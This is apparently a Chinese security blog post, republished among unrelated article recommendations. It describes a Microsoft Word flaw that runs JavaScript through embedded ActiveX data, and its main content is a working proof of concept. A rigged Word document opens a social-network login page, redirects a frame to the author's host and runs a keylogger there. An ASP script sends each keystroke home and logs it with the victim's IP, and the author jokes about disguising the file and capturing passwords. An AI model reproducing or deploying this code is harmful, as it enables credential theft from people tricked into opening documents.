对MS word javascript execution的一些测试

JavaScript中eval()为何必须禁用:安全、性能与工程实践深度解析 eval() 是 JavaScript 中一个看似便捷却极具破坏力的动态执行机制,其本质是在运行时触发完整编译流程,导致 V8 引擎放弃优化、GC 失效、调试中断、类型系统失明。从 XSS 漏洞利用到堆内存爆炸,从 DevTools 无法追踪到构建工具 tree-shaking 失败,eval() 的风险已远超‘不推荐’范畴,而属于现代前端工程中的明确禁用项。本文结合 V8 源码级原理、真实线上事故(如用户输入注入 fetch 窃取 token)、内存泄漏实测数据(42MB 堆增长)及可落地替代方案(JSO 阅读详情

<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"> </script> name="google_ads_frame" marginwidth="0" marginheight="0" src="http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-1460049757379518&dt=1211904002541&lmt=1211904002&output=html&slotname=0491039036&correlator=1211904002541&url=http%3A%2F%2Fhuaidan.org%2Farchives%2F2009.html&ref=http%3A%2F%2Fhuaidan.org%2Fpage%2F2&frm=0&cc=100&ga_vid=1733618417.1211287439&ga_sid=1211902862&ga_hid=1401323678&ga_fc=true&flash=9.0.124.0&u_h=768&u_w=1024&u_ah=734&u_aw=1024&u_cd=16&u_tz=480&u_java=true" frameborder="0" width="200" scrolling="no" height="200" allowtransparency="allowtransparency">

作者:余弦
来源:0×37 Security

Microsoft word javascript execution原文:http://marc.info/?l=bugtraq&m=121121432823704&w=2,hi群内讨论过。可以得出一些结论:

1、由于安装Q313675 安全修补程序后禁用ActiveX 内联数据流功能,使得利用JS直接创建ActiveX对象而执行恶意codz的方法不可行。如下code:

<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:document.write('&lt;script src=http://www.0x37.com/doc.js&gt;&lt;/script&gt;')"></OBJECT>

这个远程的doc.js文件能力有限。但是弹出对话框或一个新窗口还是可以的。

2、漏 洞其实出现在xml文件上,类似于上面这样构造后的html用word打开后另存为xml时,里面的数据都被相应转换为xml格式。然而xml里 的<w:ocx w:data=”……” />却可以引发JS的执行。问题就出现在这。而无论后缀是.doc或.rtf或.xml都将以word默认方式打开,此时word充当一个解释 器,<w:ocx w:data=”……” />内的数据被解释执行而引发JS。

3、AE24FDAE-03C6-11D1-8B76-0080C744F389是mshtml.dll的classid。要找出漏洞起因与修补这个漏洞这些信息还是有价值的。

既然这个JS能力有限,那就来点好玩的,如这里提到过的:http://www.0×37.com/post/15.html。下面这个POC是这样进行的:当用户打开我们恶意构造后的word文档doc.doc后,会弹出校内网的首页http://www.xiaonei.com(拿它做实验,完全是出于我的惯性……)。接着我们就可以记录用户在这个页面上的键盘记录了:)。也许密码就直接抓过来了(假如其他用户和我一样,打开校内网就直接快速输入密码然后Enter,这个完全是习惯……)。

doc.html代码如下:

<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:x=open('http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:function(){return%20′http://www.0×37.com/Project/poc/docshell.html’;}}}catch(e){}},3000);void(1);”></OBJECT>
HI

按照http://marc.info/?l=bugtraq&m=121121432823704&w=2这里的方法生成doc.doc文档(这就是那个邪恶的文档,改个好名字,方便骗人打开)。

远程的docshell.html代码如下:

<html>
<body bgcolor="#333333">
<div id="o"></div>
<input type=text id="x" style="width:0;height:0">
<script>
var _x=false;
if(window.XMLHttpRequest){
_x=new XMLHttpRequest();
}else if(window.ActiveXObject){
_x=new ActiveXObject("Msxml2.XMLHTTP");
if(!_x){_x=new ActiveXObject("Microsoft.XMLHTTP");}
}
document.onkeydown=function(e){
if(!e)e=window.event;
try{
tmp=(String.fromCharCode(e.which||e.keyCode));
_3or7("GET","http://www.0×37.com/Project/poc/docshell.asp?tmp=”+tmp,null);
}catch(ex){}
}
function _3or7(_m,_s,_a){
_x.open(_m,_s,false);
_x.send(_a);
return _x.responseText;
}
setInterval(function(){try{document.getElementById(’x').focus();}catch(e){}},100);
focus();
</script>
</body>
</html>

而远程的docshell.asp代码如下:

<%
ip=Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If ip="" Then
ip=Request.ServerVariables("REMOTE_ADDR")
End If
tmp=Request.QueryString("tmp")
'Response.write(tmp)
filename="docshell.txt"
Set fso=Server.CreateObject("Scripting.FileSystemObject")
set file=fso.OpenTextFile(server.mappath(filename),8,true)
file.write(ip+">> "+tmp+chr(13))
file.close
set file=nothing
set fso=nothing
%>

接着就可以在这http://www.0×37.com/Project/poc/docshell.txt看到我们键盘记录的结果:)。完整文件在这:http://www.0×37.com/Project/poc/wordjs.rar。不过这个键盘记录还是有缺陷的,本想结合这里http://www.0×37.com/post/15.html提到的方法来构造更邪恶的代码,可是并不顺利……那以后再说了:)。现在就等关于这个漏洞的进一步消息

Codex Goal模式与Heartbeats机制深度解析 Codex并非传统代码补全工具,而是一种以目标驱动(Goal-driven)为核心范式的自动化执行引擎。其底层依赖Goal模式作为唯一入口协议,通过结构化心跳(Heartbeats)实现状态同步、安全校验与故障自愈,构成分布式执行的生命体征系统。该设计赋予Codex可验证、可中断、可回溯的工程化能力,支撑文件操作、邮件处理、跨设备协同等高可靠性自动化场景。理解Goal Session Manager的会话约束、execution_id时序校验及@computer可信信道协议,是突破‘computer use 阅读详情

相关推荐

JavaScript生成器:控制函数执行节奏的精密调度机制

生成器(Generator)是JavaScript中实现协程式控制流的核心机制,其本质并非数据生产工具,而是通过yield暂停/恢复执行上下文,赋予函数可中断、可注入、可终止的生命周期管理能力。它基于迭代器协议构建,天然支持惰性求值与内存可控性,在处理无限序列、分页加载、实时日志流等场景中显著优于普通函数和Promise链。结合async/await底层原理可知,现代前端异步编程范式正是建立在Generator+Promise协同调度的基础之上。理解yield、function*语法及Generator对象

weixin_30376083的博客 369

模板驱动型文档自动化:让Word/PDF生产变填空题

文档自动化本质是将重复性内容生成从人工操作升级为规则化、可验证的数字流程。其核心原理在于通过结构化模板封装样式、逻辑与数据映射关系,实现‘一次配置、多次复用、零代码维护’的技术价值。相比AI生成易出事实性错误、代码驱动依赖开发响应慢,模板驱动兼顾合规性、业务自主性与实施效率,广泛应用于法务合同、HR制度、医疗文书、政府标书等强结构、高合规场景。本文聚焦Sqribble平台,详解模板四层架构(视觉/结构/逻辑/集成)与字段驱动式工作流设计。

weixin_30457551的博客 329

模板驱动文档自动化:从Word手工到可编程文档流水线

文档自动化正从简单的格式填充,演进为基于模板引擎的可编程内容生产范式。其核心在于将文档结构、样式与数据解耦,通过条件逻辑、契约化数据校验和跨平台一致渲染,实现高可靠、可审计、合规可控的批量交付。技术原理涵盖动态模板编译、CSS-like样式层、JSON Schema数据契约及双引擎PDF生成架构,显著提升法律、金融、教育等强合规场景下的内容交付效率与质量。本文深入解析Sqribble为代表的模板驱动型文档自动化系统如何重构企业知识资产的生产流水线。

weixin_38168760的博客 518

word文档的读取定位小问题

做对WORD文档读取时会经常对定位有问题,在msdn中有一个WordApp的小程序,本文就以它为例 准备:初学者对找WORD控件有很大问题,要在对office 2003中添加/更改对Net的支持 然后加入using Microsoft.Office.Interop.Word; 这样就可以引用word功能了 现在是定位问题,要对某段字符进行改变 start = 37; end =40; ...

weixin_30835933的博客 214

渗透测试 ( 3 ) --- Metasploit Framework (MSF)

Metasploit专业版和精简版的主要差别在于专业版上面集成了全自动攻击模块,通过远程API集成网络分割测试模块、标准基线审计向导模块、闭环漏洞验证优先处理功能、动态载荷规避防病毒解决方案、钓鱼意识管理和鱼叉式网络钓鱼模块、对OWASP Top 10漏洞的Web应用程序测试模块、高级命令行和Web界面的选择模块。但是,专业版是必须要付费的,所以除非用到非个人的功能,否则没有必要去使用专业版,而且,专业版和精简版的渗透攻击模块是一样的。.........

freeking101的博客 1万+

Coze Agent开发避坑指南:6个关键决策与超时排查实战

AI Agent是当前大模型应用落地的核心范式,其本质是基于条件触发、工具调用与LLM协同的自动化工作流。理解Agent的执行原理、超时机制、节点依赖关系及权限边界,是保障稳定运行的技术基础。Coze作为低代码Agent平台,将复杂工程逻辑封装为可视化编排,但隐含大量设计契约——如Bot模式选择决定执行引擎能力,工作空间类型影响插件认证方式,LLM节点配置关乎响应格式与超时控制。本文聚焦Coze平台中高频报错‘agent execution provider did not respond in time’

weixin_34343308的博客 359

Codex本地部署实战:Node.js配置、config.toml硬核调优与内容工作流搭建

本地大模型写作工具正成为内容创作者与技术型文案人的提效刚需。其核心依赖于Node.js运行时环境的精准版本控制、npm包管理器的稳定配置,以及TOML格式配置文件对上下文长度、温度值、模型路由等关键参数的物理级调优。这类工具的技术价值在于数据隐私可控、响应延迟低、可深度嵌入现有工作流——尤其适合公众号长文生成、小红书批量标题创作、技术文档自动化等强结构化输出场景。本文聚焦Codex这一典型代表,详解从Node.js契约式安装、PowerShell执行策略绕过、npm镜像源切换,到config.toml每一行

weixin_34314962的博客 639

SpringBoot+Vue社区帮扶系统开发实战

前后端分离架构已成为现代Web开发的主流范式,其核心价值在于实现关注点分离和开发效率提升。通过RESTful API进行前后端通信,结合JWT认证机制保障系统安全。SpringBoot作为后端框架提供快速启动能力,Vue.js的响应式特性则优化了前端交互体验。在社区帮扶系统这类涉及敏感数据的场景中,需要特别关注MyBatis动态SQL构建和MySQL事务处理等关键技术。典型应用还包括使用Element UI实现统一界面风格,通过Redis缓存提升志愿者调度性能。本系统采用SpringBoot+Vue+MyB

weixin_34262482的博客 349

SpringBoot集成OnlyOffice实现文档实时协作开发指南

在线文档协作系统通过浏览器实现多人实时编辑,解决了传统Office软件版本管理混乱的问题。其核心技术原理基于WebSocket实时通信和文档差分算法,在保证格式兼容性的同时实现毫秒级同步。SpringBoot作为Java生态的主流框架,结合OnlyOffice文档服务器可以快速构建企业级协作平台,适用于知识管理、在线教育等需要高频文档协作的场景。私有化部署方案确保数据安全,JWT令牌和权限控制体系满足企业安全合规要求。通过MinIO对象存储和Redis缓存优化,系统可稳定支持50+用户同时编辑单个文档,响应

weixin_30681615的博客 370

Open Claw:Windows本地AI工作流引擎部署指南

AI工作流引擎是一种将大语言模型、脚本执行与系统操作深度集成的自动化调度框架,其核心原理在于解耦模型调用、任务编排与插件扩展,从而实现数据不出本地的可控智能。相比云端AI助手,它具备低延迟、高隐私、强定制等技术价值,广泛应用于文档解析、系统运维、办公自动化等离线或敏感场景。本文聚焦Open Claw这一基于Node.js构建的Windows原生AI工作流引擎,详解其如何通过PowerShell深度集成系统能力,并依托Git submodule机制保障可维护性与可扩展性。

396

n8n集成AI Agent的7大生产级工具选型与实战

AI Agent本质是赋予自动化系统上下文感知、多步推理与自我校验能力的技术范式,其核心原理在于将大语言模型从单次响应单元升级为可编排、可治理、可审计的智能执行体。在低代码流程平台如n8n中,AI Agent并非简单调用LLM API,而是通过分层架构——基础层实现指令执行,增强层支撑长文本理解与知识检索,治理层保障输出合规与事实准确——构建起工程化AI能力闭环。典型技术价值体现在突破传统if-else规则瓶颈、降低人工兜底率、满足金融/医疗等强监管场景的可追溯性要求。本文聚焦n8n生态下真实落地的7个高鲁

sunjhgq的专栏 374

模板驱动型文档自动化:企业级知识交付的智能填空引擎

文档自动化是现代企业知识管理与合规交付的核心能力,其本质在于将非结构化写作转化为可复用、可验证、可审计的规则化生产流程。模板驱动型文档自动化(Template-Driven Document Automation)区别于通用AI生成,强调结构化模板、条件逻辑与数据映射的深度耦合,通过预置章节骨架、样式规则与变量占位符,实现PDF/Word等正式文档的零误差批量生成。该技术显著提升法务合同审阅、SaaS产品白皮书发布、医疗器械合规文件编制等高确定性场景的交付一致性与版本可控性,同时支撑跨系统数据缝合与人机协同

weixin_30855761的博客 413

GPT-5.5不存在,但执行器范式已到来:从回答到稳定执行的工程跃迁

大语言模型正经历从‘回答器’向‘执行器’的关键范式转变——这并非单纯模型升级,而是目标函数、架构设计与系统鲁棒性的全面重构。当传统benchmark(如MMLU)衡量知识覆盖时,Terminal-Bench和OSWorld等新型测试聚焦命令链鲁棒性、环境自适应性与操作系统心智模型,暴露出当前SOTA模型在状态维持、原子操作验证与过程容错上的根本瓶颈。技术价值在于将AI能力锚定于可验证的目标状态达成,而非单次响应质量;应用场景已延伸至金融合规审查、云服务自动化、科研流水线等强约束生产环境。本文基于真实Agen

weixin_34128237的博客 459

Windows本地AI助手零门槛部署:Hermes Agent与OpenClaw实战指南

AI Agent是面向业务自动化的智能工作流引擎,其核心原理在于将大模型能力封装为可编排、可审计、可集成的技能服务。技术价值体现在降低非技术人员使用AI的准入门槛,尤其在数据不出内网、无GPU、无Linux环境等受限场景下凸显优势。典型应用场景包括企业知识库问答、高校AI教学实训、行政办公自动化(如会议录音转纪要)等。本文聚焦Windows原生支持这一关键突破点,结合Hermes Agent网关抽象与OpenClaw技能编排能力,提供一套不依赖Docker、不强制WSL、不需运维介入的端到端落地方案,真正实

chunqingtai2922的博客 470

Codex报错排查:五层故障定位与标准化修复指南

Codex CLI 是基于 Node.js 构建的 OpenAI 编程辅助工具,其运行依赖 Shell 环境、Node.js 版本、npm 包管理、PowerShell 执行策略(Windows)及 API 认证五层耦合机制。常见报错如 'command not found'、'SyntaxError: Unexpected reserved word' 并非随机异常,而是某一层执行链断裂的明确信号。理解 Node.js 运行时兼容性(尤其顶层 await 要求 v16+)和 npm 全局路径配置逻辑,是解

weixin_33704591的博客 453

Gemini 3.5 Flash:面向Agent的低延迟推理范式革新

大语言模型推理延迟是制约AI Agent实时性的核心瓶颈,其本质在于首token延迟与持续生成吞吐受限于Prompt编码、KV Cache初始化及内存带宽等底层环节。Gemini 3.5 Flash并非简单压缩模型,而是通过分词-embedding联合流水线、预测性KV Cache预分配、分层缓存架构与量化感知kernel融合等技术重构推理栈,实现65ms首token延迟与289 tokens/秒持续输出。这种面向Agent工作流的定向优化,显著降低长程任务中的时间熵增,提升工具调用准确率与系统容错性,使A

angzhan5306的博客 296

机器学习驱动的视频会议无障碍技术实践

视频会议无障碍是指通过技术手段保障听障、视障、言语障碍及神经多样性用户平等参与实时音视频协作的能力。其核心原理在于融合多模态感知(语音、唇动、手语、加速度)、端云协同推理与个性化建模,突破传统ASR/OCR方案在噪声鲁棒性、低延迟响应和认知适配上的局限。技术价值体现在将信息接入权从‘可用’升级为‘可理解、可控制、不焦虑’,显著降低ADHD、自闭症谱系及中重度听力损失用户的认知负荷与交互门槛。典型应用场景覆盖远程教育、在线医疗、司法听证及企业协同办公。本文聚焦机器学习在实时语音降噪、个性化字幕生成与手语-语音

weixin_33674976的博客 330

AgentKit vs n8n:AI Agent生产落地的封装权衡与工程选型指南

AI Agent并非黑盒执行器,而是需在可控性与效率间动态权衡的工程系统。其核心在于运行时封装层级——高度封装的AgentKit简化LLM调用与工具编排,适合快速验证;而模块化设计的n8n将决策权交还工程师,支持自定义节点、细粒度错误处理与全链路可观测性。技术价值体现在对混合AI栈(OpenAI/Claude/本地模型)的兼容能力、私有化部署自由度及GDPR等合规审计支撑。典型应用场景包括智能客服后端集成、预测性维护工作流、跨系统事务协同等。当需求涉及内部API对接、字段级Jira映射或实时审计日志同步时,

weixin_30335353的博客 438
上一篇: IE0DAY网马
下一篇: CSRF: 不要低估了我的危害和攻击能力
iiprogram
博客等级 码龄25年 1066粉丝 1515原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值